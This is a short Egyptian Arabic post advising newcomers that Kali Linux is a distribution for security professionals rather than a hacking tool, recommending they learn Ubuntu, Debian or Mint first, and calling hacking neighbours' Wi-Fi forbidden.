ملاحظ ان فيه اسئلة كتير بتيجي بخصوص كالي لينكس .... هو ليه الناس فاهمة ان اللينكس ده معمول للهاكنج ؟؟ اللينكس فيه توزيعات اللي معروفين منهم اكتر من 450 توزيعة ليه كله مركز مع الكالي بس ..... اللينكس ده مجرد نظام تشغيل زيه زي الويندوز او الماك او غيرهم وكمان توزيعة كالي دي مخصصة للناس اللي بتشتغل في السيكيوريتي عموما وعلى فكرة تقدر تكون شبح في السيكيوريتي وانت بتستعمل الويندوز عادي صح بمجهود اكبر شوية لان اللينكس بيسهل عليك حاجات لكن النتيجة في الاخر واحدة .... مينفعش تكون جاي من الويندوز مباشرة على الكالي احنا ابتدينا باوبونتو وديبيان ومنت ولما ايدينا مشيت في اللينكس كنظام تشغيل نزلنا الكالي فياريت متنطش علطول على التوزيعة دي غير لما ايدك تاخد على اللينكس عموما ودي مجرد نصيحة مش اكتر علشان متضيعش وقتك ..... الكالي مش معمول علشان تخترق واي فاي جيرانك طبعا هي حرام في كل الاحوال بس تقدر تعملها بالويندوز او حتى بالاندرويد ..... مش مهم العربية المهم السواق
